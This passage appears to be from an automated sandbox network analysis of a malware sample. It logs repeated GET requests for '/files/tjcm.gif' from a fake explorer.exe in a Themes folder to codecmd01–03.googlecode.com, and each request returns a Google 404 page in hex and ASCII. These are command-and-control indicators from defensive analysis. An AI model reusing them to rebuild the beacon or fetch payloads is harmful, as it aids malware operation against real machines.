100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:53.645751953 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              72192.168.2.651223173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:54.057969093 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:54.770368099 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:54 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:54.770414114 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              73192.168.2.651224108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:55.250252008 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:56.220268965 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:55 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:56.220283985 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:09:56.220293999 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:09:56.220765114 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:55 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:56.225394964 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              74192.168.2.65122564.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:57.220171928 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:57.969866037 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:57 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:57.969885111 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              75192.168.2.651226173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:58.333477020 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:59.059003115 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:58 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:59.059021950 CEST224INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;h
                                              Sep 30, 2024 16:09:59.059045076 CEST270INData Raw: 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d
                                              Data Ascii: eight:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</b> <ins>Thats an error.</ins> <p>The requested URL <code>/files/tjcm.gif</code> was not found on this server. <ins>T


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              76192.168.2.651227142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:59.971525908 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:00.752176046 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:00 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:00.752201080 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:10:00.752216101 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              77192.168.2.65122864.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:01.128830910 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:01.843439102 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:01 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and 